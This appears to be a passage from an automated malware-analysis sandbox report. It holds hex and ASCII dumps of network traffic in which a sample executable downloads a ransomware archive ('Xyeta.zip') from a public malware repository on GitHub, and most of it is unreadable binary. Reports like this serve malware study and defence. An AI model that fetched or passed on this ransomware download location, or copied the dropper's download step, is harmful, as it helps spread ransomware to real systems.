                                                                                                        2022-09-29 12:45:44 UTC7330INData Raw: 0b 2f ca 7f 3a 60 10 4e a5 6f ea 61 88 87 9f 6e ac 64 f5 1b 8d 40 3a ed c8 14 a1 e8 5d 2b b9 16 ef fa d3 e6 c5 f0 59 3a 82 55 6e f1 8a 64 c7 fc c3 27 2f 1a cc ab 78 e6 f5 0f 24 03 3c fb d3 40 86 0a ea af 10 dc 5f fd fa 77 b8 aa 8f d6 29 48 6e ea e4 29 51 cb f7 b7 fe af 0e b9 44 ad 66 6a 0f b0 c5 e7 ce ac e2 4f da 6d 83 da b9 9f 7e cc 26 9f 46 13 df fe c2 d2 43 2a d1 df a4 a0 12 19 f7 13 9f 52 fd 6e 3d bd 4b 04 56 7c 24 bc 86 f5 99 3e 74 9a d4 81 0d 93 e4 b6 04 78 4e 90 04 19 eb 85 db fb 7d 96 8b e5 ee ea f6 74 c8 9f d9 09 6b aa af 8b fb 19 65 3d e4 e7 7f 90 bf 7e 8e 46 c7 d2 a5 69 c1 23 79 4c b4 47 4b 39 fc 49 50 5b f5 61 c8 c3 29 ab 12 51 16 b9 a3 f9 e4 76 e6 87 4d 1a 55 53 a3 f0 9b 67 75 e2 b6 18 17 35 62 9a 7f 6d e2 ce 86 6f 43 fb dc f4 22 ad 88 72 f5
                                                                                                        Data Ascii: /:`Noand@:]+Y:Und'/x$<@_w)Hn)QDfjOm~&FC*Rn=KV|$>txN}tke=~Fi#yLGK9IP[a)QvMUSgu5bmoC"r
                                                                                                        2022-09-29 12:45:44 UTC7346INData Raw: 41 90 7b 81 c6 d2 f3 8b 75 c9 22 12 8c 8d 78 e4 7b cc 46 89 ea d3 c6 41 a9 00 f9 63 7c 70 e9 2d d6 6c b0 fd 30 c4 21 a4 61 2a 04 78 31 92 05 fc 9d 4c ec 92 09 f1 65 23 db 76 03 56 6a 58 50 e9 88 42 d1 cb c8 90 86 d0 55 21 ea af ed 0f be 73 ac 1f 3b 8c 2b ae 8f eb 88 d8 19 7e f0 88 81 07 3b ae 04 02 1f 39 f4 9f bc 13 d5 d7 a7 da 45 24 cc e3 f4 0b 6e de 51 f8 3b 52 db eb 16 28 f1 e9 8b d3 5e a9 6b c2 ee 4d 60 85 86 bb 0e 96 7a 63 79 b7 29 17 f0 a9 db 54 6a a3 be 92 8c 86 ff 38 02 9c 73 5f f5 1b 0d 57 82 46 bf 91 e5 1d e3 7a 43 ab c5 c6 2b 02 ff c0 2f c8 0a d4 84 99 92 9f 95 c1 f7 c0 62 f7 f2 8e f9 0d 51 f3 92 5d 34 f3 b6 ca bf fa b3 c3 21 a8 d2 45 c2 b5 8b 2f 6e 60 3f 18 6b c5 f2 c0 84 db 59 b4 c2 90 19 3f 37 a6 71 ac bd 2a be 49 cd ed a0 5a f5 3d 01 1f 2a
                                                                                                        Data Ascii: A{u"x{FAc|p-l0!a*x1Le#vVjXPBU!s;+~;9E$nQ;R(^kM`zcy)Tj8s_WFzC+/bQ]4!E/n`?kY?7q*IZ=*
                                                                                                        2022-09-29 12:45:44 UTC7362INData Raw: 08 9a 8f 47 13 3f 5f 05 8f 1b 4c 02 94 dc cf d6 fb 2e 18 f0 ae 04 94 af e5 9f 10 a4 3d af c0 58 10 02 93 61 ac 75 f9 34 e8 c1 a8 23 7b c1 3b e6 c2 c8 d9 f9 3f 59 ce 08 e8 fe da e9 99 df 76 64 84 56 8c c8 bd 9e 0d 88 f2 af 41 a0 cf 8a c8 f9 37 9d 5c 8e d4 5d d0 ca b8 ab 93 71 a2 48 79 10 c8 35 ab c2 1c 7d f5 fa c2 c5 ba 0f 9f de 7f e5 1e 85 05 15 c5 13 fc 1c bb 8d 38 df c5 dc 56 bd 31 32 6c 18 10 23 de 6d 65 cf 67 2a 2a 03 e0 e6 ae f8 7b e8 f1 15 10 2b 88 8f 54 16 f3 10 7c c9 a3 2f 64 29 21 1a 97 66 f9 0d 38 63 b2 9c f9 e3 55 05 31 1c bc 22 cd d9 dd c0 6f a6 89 db aa f0 1e 44 b8 d6 1e 77 d7 de 2d b7 ea 3f 32 bc 22 d4 af c1 95 e7 9b 80 ab da 17 4c 46 9b 06 bc 51 ab f8 60 f7 1c 54 84 3b 4a 54 a0 74 39 72 90 79 37 19 69 09 a9 39 bd 0c 15 7c b7 fe a1 42 60 64
                                                                                                        Data Ascii: G?_L.=Xau4#{;?YvdVA7\]qHy5}8V12l#meg**{+T|/d)!f8cU1"oDw-?2"LFQ`T;JTt9ry7i9|B`d
                                                                                                        2022-09-29 12:45:44 UTC7378INData Raw: 21 fe ec 41 a6 01 f2 29 fd 5b 2d 28 59 2b 0c b5 70 f1 26 7e 1a 6d 75 2e c3 22 f2 cb ab a6 5c be 5b 3c 67 ba 55 a6 f8 24 5e 9a d7 2b 63 78 0c 81 6c c3 04 88 2b cf 2f 02 97 a7 be 0b f7 e7 a2 84 02 11 8b 4e a9 c4 d6 d5 11 d0 41 1e c3 db 6e c4 bd 03 ea 64 a7 f8 88 23 de 7a eb a3 91 f8 f6 1f 14 74 48 7c ca d4 c8 ce 9f a4 55 c9 4f 87 21 5d e5 85 e8 33 68 57 c8 31 db 12 2d 0e e2 ae d5 83 91 3f ce 7c 07 20 02 62 c7 49 88 23 f6 c2 93 08 54 01 4c e0 0d ca 49 3a b6 cb 02 5e 27 a7 21 33 90 87 b8 57 b8 07 b6 c6 f5 14 91 1b 08 0c 58 82 5a 49 ae 02 8b be 19 fc ac 2c 57 7c f7 40 0c 46 e6 af d6 25 a1 f2 4f 29 b3 2c e8 60 ab be 10 62 ec da 89 44 25 54 3f 82 32 42 de fd 32 1c 0a f5 4e 2a 9a e1 a9 f6 67 64 78 16 62 c4 0f bb 0e 47 0f d3 a0 66 ed 87 b9 f5 b0 85 7a ce 84 f2 e6
                                                                                                        Data Ascii: !A)[-(Y+p&~mu."\[<gU$^+cxl+/NAnd#ztH|UO!]3hW1-?| bI#TLI:^'!3WXZI,W|@F%O),`bD%T?2B2N*gdxbGfz
                                                                                                        2022-09-29 12:45:44 UTC7394INData Raw: 98 1f 73 63 4a 7c c0 0f fa 99 2a 4e 3e a1 5e f3 f3 7b 85 1c a8 a3 e2 67 86 6f 64 c0 5d b8 0c 18 e6 c1 13 0f ba 4d 3f e3 4e 33 12 49 41 e6 fe d2 8a a9 43 f7 56 a2 16 02 0d 82 56 1b 98 f2 f4 e0 98 6b 46 5a 59 32 f2 2c 81 f2 2e a5 a6 d3 1f 14 12 fa 83 64 61 62 7b 18 85 08 97 57 8e 1d 72 57 2b 98 e6 64 b2 e0 51 9e 4e 8b 4a b4 5c 18 34 01 d3 41 03 01 13 cc cd f5 f3 ab c8 b4 e2 69 6e 7b 13 f4 86 88 9e 06 68 d9 43 3f 2c 62 8b 1b 1f 46 6a 3d 42 55 ee 2f 28 f5 01 36 b8 28 20 8b ea 50 be df 66 ed c9 ae b8 2c 32 c3 98 ba 70 25 b2 64 f3 82 d4 81 98 dc a6 22 20 3a e5 16 eb e4 6a 6f 47 93 0b 1d 26 4b 4a 6c 6f 24 32 31 72 25 df 87 cf cd de a1 d7 e6 ef 1c ff 5f e9 ac fa b5 7b eb bb 74 9a af 9f 0d a3 6d 46 e4 44 41 b3 e3 d4 1d 87 4b 11 dc 9d f8 df 3e 02 6b 3e 67 17 a2 8c
                                                                                                        Data Ascii: scJ|*N>^{god]M?N3IACVVkFZY2,.dab{WrW+dQNJ\4Ain{hC?,bFj=BU/(6( Pf,2p%d" :joG&KJlo$21r%_{tmFDAK>k>g
                                                                                                        2022-09-29 12:45:44 UTC7410INData Raw: 03 b8 cd 98 b9 bc ed 0d 12 42 ce 33 04 da c2 b5 3e 58 df ba 84 3d b0 fb 08 69 23 de 83 08 53 f7 b2 9a 25 41 ab e4 18 40 ea 21 5a 68 d5 7f 8f 7f 2f 82 46 85 be 73 0b d0 13 cd 68 7f bd 27 c0 8d f8 9c 85 f1 c7 78 27 ac 93 1c be 15 cf c6 66 d3 83 d0 3d 40 9b 93 e9 5e d2 2d 2c 8f 8f a6 27 d1 41 99 88 f7 13 62 84 f3 cd d1 2b 61 75 74 04 1e 35 0d d8 d0 d4 fa 33 fb 2e 75 04 33 ff 1e 82 82 0b 4e 70 e1 c0 33 fc da ef 59 bd 8f 4f cd 84 f4 cf c5 26 88 d0 40 94 bf d7 5f 0e 13 f9 94 d7 fe 69 89 5f b0 94 1f 88 7a 86 9e a2 2d 20 24 0a 67 a7 c2 16 fe fc f4 eb be 2e 92 d8 76 79 93 d3 03 ab 7b 11 42 cb b0 dd 7e 85 eb 32 d7 a0 9d 20 30 29 af 9b 47 96 c8 b6 2b 54 21 89 f2 a1 a9 2d 0d 67 f1 82 b8 a3 96 03 ff 2e cc 3c bc ee 5b f6 20 07 b1 b7 d8 8d cf 8b 4c 30 0a dd 0a e6 8f 94
                                                                                                        Data Ascii: B3>X=i#S%A@!Zh/Fsh'x'f=@^-,'Ab+aut53.u3Np3YO&@_i_z- $g.vy{B~2 0)G+T!-g.<[ L0
                                                                                                        2022-09-29 12:45:44 UTC7426INData Raw: 87 cf 10 e5 fc 6c 09 63 00 99 20 6f f2 ff 6d c4 eb cf 57 91 05 5a ee 87 d7 89 1a 6f ce ea 7c c2 12 46 08 2c a0 76 ec 6d 65 65 52 65 29 09 8b 97 70 97 92 a9 bb 33 f6 3f ac 39 17 ac 90 5e 1d d7 17 be 0c e2 d8 7e 62 88 70 70 e0 64 32 01 ce f1 ea 9e 72 07 4c f1 e9 3a 84 a2 7b 53 be 17 92 69 18 c6 37 ca b7 13 ed 49 92 dc 81 6b 81 70 5e cb b7 cb a6 31 41 b3 b1 7d ec 89 12 a4 80 4b 4f ef 7c a7 1c 1a 76 73 b4 6b fe 50 f4 5c ae 8e e1 80 b0 53 6d 0e ab ea dc 33 8a b2 5d fc 5e 72 b0 e5 6a 02 a3 48 7e 3d 1e 48 4f 15 25 ab cc 28 b9 e5 96 9e 70 95 b7 b7 11 05 8e b5 1d c3 d1 a3 50 43 ab ed 86 75 25 83 c6 b3 74 e6 24 6a 7c bf d9 3d 72 01 9c 2f e8 49 6e fa a8 2b 87 6e dd f9 01 41 1e 91 49 58 1e b5 ca c0 87 a1 09 58 5a 9b 0d 4c 8e 27 7d e3 1e 53 dd 49 27 21 27 59 31 2e 6a
                                                                                                        Data Ascii: lc omWZo|F,vmeeRe)p3?9^~bppd2rL:{Si7Ikp^1A}KO|vskP\Sm3]^rjH~=HO%(pPCu%t$j|=r/In+nAIXXZL'}SI'!'Y1.j
                                                                                                        2022-09-29 12:45:44 UTC7442INData Raw: 8c 7d b7 79 71 91 43 93 ef 6c af 81 f7 08 58 82 ec 37 e6 a7 6a a4 a2 28 c2 84 57 fa e0 f5 ae 80 8a 0e 5b f4 c0 b6 5f 64 da 2b 82 df 7b 80 e0 0d 06 e8 80 6f ac 36 b8 38 60 92 b3 c7 c5 92 ce bd 81 e3 01 fb 3b 31 f3 7f 02 51 44 8f 8d 5f 6f f5 0f 9b ba e3 9a 2d 6d 83 51 0f e5 f3 64 3c 60 71 e4 94 83 96 3b ee 79 1e 92 51 9f 34 1b fe fc 73 10 f3 07 b6 2a 0d 6a d9 81 ba 16 fb 03 e5 b3 2c e7 6d d0 5b 7d 26 c8 b3 9f 18 f6 b0 b9 3e 35 54 f5 57 32 23 af 41 0b a9 b3 82 0a 1e 51 c4 98 aa 9c 6c d5 39 70 78 2f 9e ac 58 31 19 02 cb 3d 07 44 9e 4d 86 78 b2 a7 28 d7 05 e0 66 e0 9d e2 2b 4a 88 72 4a a6 f4 22 28 01 c3 19 80 1c f7 ce 8c 1a 48 e8 78 7b c0 95 1e a4 e6 98 64 a7 02 c3 7b 3b 57 3c b0 db 79 83 26 bc 8d 1e f7 dc 55 f3 06 b2 da 60 78 2d c6 f6 b1 3a 99 bd c9 e7 90 98
                                                                                                        Data Ascii: }yqClX7j(W[_d+{o68`;1QD_o-mQd<`q;yQ4s*j,m[}&>5TW2#AQl9px/X1=DMx(f+JrJ"(Hx{d{;W<y&U`x-:
                                                                                                        2022-09-29 12:45:44 UTC7458INData Raw: ba a7 26 95 02 89 f6 59 9c 0f bc c3 d1 dd 3c e7 bb 1d 12 ce 28 b7 d3 ad 83 5c 7f e8 c4 32 a5 4b c1 79 04 b6 56 43 82 da 5b 9f 27 b6 ed cd 6a 53 93 4a 67 c7 85 62 ff ee 08 29 e9 d2 36 1c 79 4f 74 8c 2d e7 cb 9d d3 99 e5 5f 03 85 04 aa be 8b 6d bd 6c 58 e6 fd 89 be 67 62 d7 0b 16 4a 0e 90 b5 90 5d af 62 99 44 36 02 3e 6b d8 69 e4 c5 6e 69 01 dc b4 30 96 98 94 72 fa 09 77 f5 1a f2 e6 e6 fb a4 ef cc 0b ab 41 6e 10 9c bb 95 ed ed 42 bc 36 08 0b fd 42 17 f1 3a d4 d9 26 1d 34 83 63 7a 4c 7c 4a 7b f8 46 05 06 61 5d c2 ad 33 67 55 b0 2b 9d 1c 39 65 84 26 13 f9 ea b4 ad 2f 43 8e 2c 82 c3 1d cb 77 f4 99 f8 61 ba 62 40 e2 af 06 a8 d4 52 81 a6 c7 d4 4c c2 bf 67 45 b3 bf 23 9f 95 dd c9 f6 60 0a dc 20 1d 24 60 b3 e7 8b 13 ac 1d 6d c1 03 57 b3 1d 07 2a 1a d7 0e 27 9f 99
                                                                                                        Data Ascii: &Y<(\2KyVC['jSJgb)6yOt-_mlXgbJ]bD6>kini0rwAnB6B:&4czL|J{Fa]3gU+9e&/C,wab@RLgE#` $`mW*'
                                                                                                        2022-09-29 12:45:44 UTC7474INData Raw: 45 f1 7f b3 b0 5c 74 ec f6 39 a3 bd 9f 74 c8 a1 0b 1a d1 c5 e1 20 3f c4 10 42 87 d6 32 23 4f 3f 55 c7 01 c0 c8 55 9c 04 f5 a4 20 80 8d 34 5a bb 5f eb 22 bf 4e 0e f4 cc 09 95 6f fb 51 22 72 fc 92 ee 88 13 3d fc 7c 1f 7a a7 e0 48 f0 2a 94 06 9e 5b 01 11 61 74 3c 11 03 03 4a 5e d5 56 c5 3c 88 37 f6 a0 f1 21 eb 76 7f 72 24 5a 7a 97 a4 db 15 e7 08 6e 21 7c 64 8a a8 8c 56 31 9d 2e ca a9 81 f1 42 5d 56 cc e1 f4 45 bb af da 6e e5 fd 59 ca d1 6b 23 8c a3 c5 12 2d 16 ee 4b 3e f0 34 b7 27 29 81 26 c1 de ed d4 30 ca 74 d6 6f 83 33 42 82 bd 28 a9 66 51 88 fe c3 42 b1 d4 18 a3 38 2d aa ab fc 2d 1e 18 37 77 3d f1 22 f9 d5 b2 6e 3f 5b 72 6f ed 41 06 a9 62 fa f1 3c ce f3 1f b4 2b 0b ea 9e 59 4b 5b a1 b5 57 74 45 53 bb bd 77 6c 53 65 7e f8 db 87 78 ab 94 bb 0f d9 05 fc c8
                                                                                                        Data Ascii: E\t9t ?B2#O?UU 4Z_"NoQ"r=|zH*[at<J^V<7!vr$Zzn!|dV1.B]VEnYk#-K>4')&0to3B(fQB8--7w="n?[roAb<+YK[WtESwlSe~x
                                                                                                        2022-09-29 12:45:44 UTC7490INData Raw: 07 ce 8e 79 78 c8 e0 b7 ba d7 62 dc 17 2f 7b 6a e6 b5 7b 60 63 f5 e2 bd af 37 85 aa 31 1c e6 e0 44 56 53 72 99 2a 3a bf 46 ab 97 ae 30 ea a1 cc ee 67 33 11 8b c7 d0 b8 64 b6 4d 02 9b 92 19 aa 58 b2 09 9d cd cc bf 18 f6 a9 02 b0 ec 25 f1 75 0f ea f9 27 c0 70 dc d6 c9 3f 03 cd df f1 c9 0b 46 ba 4b a4 e3 38 4e 94 de d7 af 9e 48 84 e0 e7 f7 cb ed 27 a1 74 ae 92 93 eb d4 03 11 9f 45 b4 23 aa ca a6 96 7f bd c6 52 4a 9f fe 64 ec 41 2c de 14 6a c6 d2 e0 38 71 9b 71 69 50 0e f7 45 55 40 31 10 bc b2 c6 24 b7 53 37 d4 fd fc 00 ea d3 b6 b7 4e 00 09 2b 65 6d 8d 15 18 29 50 b6 f0 43 b1 f2 bd 62 ab d8 9f d7 95 4d 30 e8 de bc fa 40 04 c2 c6 ca 53 14 99 1a 1b e4 f6 77 ba 24 12 e7 ca e5 af c1 ef 5c 69 2f 55 f2 1b 1a 50 5c 40 f9 17 a9 75 6d 12 75 fa 1f 44 c7 bb b8 ea cc 5e
                                                                                                        Data Ascii: yxb/{j{`c71DVSr*:F0g3dMX%u'p?FK8NH'tE#RJdA,j8qqiPEU@1$S7N+em)PCbM0@Sw$\i/UP\@umuD^
                                                                                                        2022-09-29 12:45:44 UTC7506INData Raw: 08 8e 89 86 ad c5 6a f0 8d c2 83 7f 2d 51 24 50 cf 14 bc b4 0b 6e c7 2f df db c7 13 0d 6c be f5 80 2e fa 6f c6 7c 53 a6 a3 09 a3 c7 2b c5 63 91 78 3f 49 9b 78 d3 27 14 68 4a 0a 15 99 f9 a0 9f 93 5e d4 d5 21 2d 58 8f d0 c2 26 86 20 6b b7 7f b0 4b 34 05 55 9d ef 45 f2 c0 b6 81 89 e4 7d b7 04 1a c7 3b e1 d4 c1 04 a1 a8 96 83 45 2b 77 68 3d 31 49 0f 1c 0f fa ae 80 12 99 2b 08 31 1c ac 2e 62 78 d7 a7 3e cb 65 b7 f0 f9 fe b0 6d f5 24 1c e7 56 72 58 f3 29 05 de 08 87 eb cb 31 69 b5 9d bd 2d 47 19 8e be b2 41 91 6d 03 6b 7a 7b 3c 43 c2 94 6f 0c 5a f4 1e c1 18 f0 f6 5f 18 0f b4 31 47 30 dc 21 34 37 1a 71 65 31 1f 29 42 c9 51 4e 76 f4 3b 6a c2 9c 5d a1 20 ba 8e c8 e7 81 26 4d 59 d7 01 a4 a9 11 f3 b9 13 62 9d 5f d7 d2 35 51 b7 82 85 1f 3c b1 65 10 05 7b e9 3e 75 6a
                                                                                                        Data Ascii: j-Q$Pn/l.o|S+cx?Ix'hJ^!-X& kK4UE};E+wh=1I+1.bx>em$VrX)1i-GAmkz{<CoZ_1G0!47qe1)BQNv;j] &MYb_5Q<e{>uj


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        26192.168.2.449768140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:46:02 UTC7519OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Xyeta.zip HTTP/1.1
                                                                                                        Host: github.com
                                                                                                        2022-09-29 12:46:02 UTC7519INHTTP/1.1 302 Found
                                                                                                        Server: GitHub.com
                                                                                                        Date: Thu, 29 Sep 2022 12:46:02 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                        Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                        Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Xyeta.zip
                                                                                                        Cache-Control: no-cache
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                        X-Frame-Options: deny
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 0
                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                        Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                        2022-09-29 12:46:02 UTC7520INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        27192.168.2.449769185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:46:02 UTC7522OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Xyeta.zip HTTP/1.1
                                                                                                        Host: raw.githubusercontent.com
                                                                                                        2022-09-29 12:46:02 UTC7522INHTTP/1.1 200 OK
                                                                                                        Connection: close
                                                                                                        Content-Length: 77102
                                                                                                        Cache-Control: max-age=300
                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                        Content-Type: application/zip
                                                                                                        ETag: "3aa8e4e319c7c273c5d9fc9071b3c14c66404cc71f0c3bd72a0137f90c54bbe3"
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-Frame-Options: deny
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        X-GitHub-Request-Id: BC80:0543:E4C491:F3028B:6335934D
                                                                                                        Accept-Ranges: bytes
                                                                                                        Date: Thu, 29 Sep 2022 12:46:02 GMT
                                                                                                        Via: 1.1 varnish
                                                                                                        X-Served-By: cache-mxp6967-MXP
                                                                                                        X-Cache: HIT
                                                                                                        X-Cache-Hits: 1
                                                                                                        X-Timer: S1664455562.463275,VS0,VE1
                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        X-Fastly-Request-ID: 3742fcfe4899d86872e947f892fd0dc6e5abf8dd
                                                                                                        Expires: Thu, 29 Sep 2022 12:51:02 GMT
                                                                                                        Source-Age: 61
                                                                                                        2022-09-29 12:46:02 UTC7523INData Raw: 50 4b 03 04 14 00 01 00 08 00 3b 0c 3d 3e 89 23 ff 7d 80 2c 01 00 00 50 01 00 14 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 58 79 65 74 61 2e 65 78 65 e0 56 04 74 2a 4a 9d b0 12 3a 4b 00 4a 15 97 da eb db 90 28 9e 54 ae ce 0c 86 03 d2 18 7f a9 7a 76 ec 1d b8 f3 06 2b 6a 51 00 b5 73 d8 81 6c 15 ae 27 4f 5a 02 f3 35 ad 61 07 63 7d 2e 8e 3e f1 f3 2b 88 4d e4 5c 81 c5 e4 b7 17 43 2c 63 ab 0f c5 a0 45 17 4c 36 40 6d 6c a0 44 f5 2f 82 26 57 0e b1 66 5e bd c6 8b 13 60 9e 97 dc 8a 06 8b 1f fa 02 54 b6 25 08 75 90 c3 c0 98 58 ae 9e d6 1e c7 c4 25 e8 17 46 ff a0 69 e6 e7 16 27 10 46 8b 84 04 12 ca 52 2d 8c 38 bf 39 66 3a d3 ec fe ff ee 80 c3 64 f1 c7 e2 47 64 d1 42 02 f1 2f de a4 13 00 26 67 12 63 bb 54 97 c0 50 23 d8 5d a0 3e 77 7f 89 26 53 5c 7f 69 13 62 13 98 e6
                                                                                                        Data Ascii: PK;=>#},PEndermanch@Xyeta.exeVt*J:KJ(Tzv+jQsl'OZ5ac}.>+M\C,cEL6@mlD/&Wf^`T%uX%Fi'FR-89f:dGdB/&gcTP#]>w&S\ib
                                                                                                        2022-09-29 12:46:02 UTC7539INData Raw: 96 2d 85 69 8a 19 f4 01 31 ad 1c 30 8d be 07 bd 6b c6 18 36 2e 31 13 e8 15 d4 0d f5 84 08 71 4a 32 a8 6b 66 0e 61 79 ab 23 40 88 7b 48 58 4b 05 6f 0a 8c 0f bc b2 22 72 0b bc 3a ff 5b 52 bb 5e 18 3a ba d5 10 23 14 d7 ba c0 9d 22 c0 d7 24 28 6a 72 78 04 8c ac 0c 7b 77 ce 2c 1e a9 2b 8e 21 19 45 b6 5d 5e bf ab ca d4 3e fc 3e b6 b8 a1 fa fa 0e bd 81 5d 27 01 3d 38 57 9f 5e c4 d4 d8 fe 02 85 2d fc 30 5d 45 c6 8e f7 3b 53 d6 f6 78 5f 10 2c 92 89 6d a3 37 d1 8d e1 81 8a 51 92 d4 36 b2 87 ad f9 7b cb 81 dd ba 23 9a 8d 91 c8 c9 c9 c2 27 48 9d c3 39 7e 8d 29 6b 1f 2f 79 2b 34 32 d8 8e b3 34 f0 ce c6 f4 f2 64 66 fc 32 8a 85 59 bb c8 dc cd de 47 b2 7f 5d 38 7e 7b 37 07 60 27 c5 e0 91 2c b6 8d b2 b6 b3 ce 6e 18 91 56 88 c6 1f 39 a4 9b 5c a6 ca c1 21 93 c7 ac b7 59 6f
                                                                                                        Data Ascii: -i10k6.1qJ2kfay#@{HXKo"r:[R^:#"$(jrx{w,+!E]^>>]'=8W^-0]E;Sx_,m7Q6{#'H9~)k/y+424df2YG]8~{7`',nV9\!Yo
                                                                                                        2022-09-29 12:46:02 UTC7555INData Raw: 05 87 4e 75 b6 cd 74 07 9a 6a 63 98 fd 61 2e 5f 6c 4f 3c 57 56 57 b0 ee bf 1b 9f c1 8a 9d 96 1a d8 e8 8c b9 55 6b bc 9a 3c 41 f7 99 a4 33 dc c2 6e cc d7 ea f2 2e 1f 13 02 ae 81 b5 32 57 c0 43 44 2e 22 7e 9d a3 1b af 75 61 e8 e0 1a c8 2b 6f 91 13 c5 1a 1c dc 07 27 a4 b1 17 31 dc c0 ad fc a3 74 8f 8d a1 c5 2e 86 aa 83 d6 bc 25 41 38 dc 95 30 98 e8 68 93 b1 21 db 9b d7 2e a2 40 4e 63 ad fa 23 98 ce a9 e4 5e 01 5e 46 96 3e 70 cc 56 5d 1c 03 5b 0a 70 68 26 1f 32 b7 8e c9 72 42 46 41 08 e0 3b 0c 98 05 b2 18 dd 55 15 4a ec 22 8b cf 6b b1 2c 74 f6 3d 8b bf 5e 18 23 1f 33 44 81 a2 ea 4e cc f2 e7 c3 f8 12 db a1 58 60 51 66 53 ee fd 37 55 61 33 ba 60 e4 cd ed e5 49 b5 f3 83 c4 aa 24 f1 84 04 fb 24 64 f2 1c e3 a8 71 28 35 c6 bf 9f d2 25 f5 a5 a4 84 2b 50 ff 57 53 e3
                                                                                                        Data Ascii: Nutjca._lO<WVWUk<A3n.2WCD."~ua+o'1t.%A80h!.@Nc#^^F>pV][ph&2rBFA;UJ"k,t=^#3DNX`QfS7Ua3`I$$dq(5%+PWS
                                                                                                        2022-09-29 12:46:02 UTC7571INData Raw: 17 07 4f 67 6b 6c f4 db f2 00 0c 8a 41 4e de 7e 8c 6a 05 68 66 2e c6 72 93 fe 01 f9 00 47 92 ce 7b 43 05 ac fa 27 3e 99 3c db 4e 8a 49 a4 04 21 b4 0f 08 b2 d2 f4 5c 42 ab 14 f8 1c 1a 29 82 ed be db ab c2 5a 0d 39 29 55 b1 8d b7 0c 2a 66 28 1e 43 22 c4 2c 45 7c f3 d1 48 c1 f0 72 4a f3 a3 f7 62 ab 73 fe e2 3f 56 7f 39 22 ff 7c 01 fc 21 c2 e7 be 10 41 02 08 ee 41 7a 1f 84 15 1a 8c e4 aa 3a 60 05 c5 dc 44 6a 76 a1 18 54 7f 21 2c de 51 3c 2e 20 b1 fb 94 33 5b 40 1f d9 60 e7 71 d1 e7 89 03 a3 25 5e 7c 00 2a 28 f1 7e 65 e8 20 56 6f 2c df 8d e4 c1 a3 20 a3 a5 02 75 98 b5 cb 9a 1e b0 90 81 64 1b 45 af 31 96 8e 3b 4f 3c 4f 3d 6c 45 7b 67 92 43 5d 24 1d 99 24 d1 7b 2e 98 62 ca 7d 3c 88 e4 2c 41 81 73 99 8c 91 e0 a8 f2 32 99 02 ed 11 77 95 7e 1d da 5f 6a 24 2c f2 07
                                                                                                        Data Ascii: OgklAN~jhf.rG{C'><NI!\B)Z9)U*f(C",E|HrJbs?V9"|!AAz:`DjvT!,Q<. 3[@`q%^|*(~e Vo, udE1;O<O=lE{gC]$${.b}<,As2w~_j$,
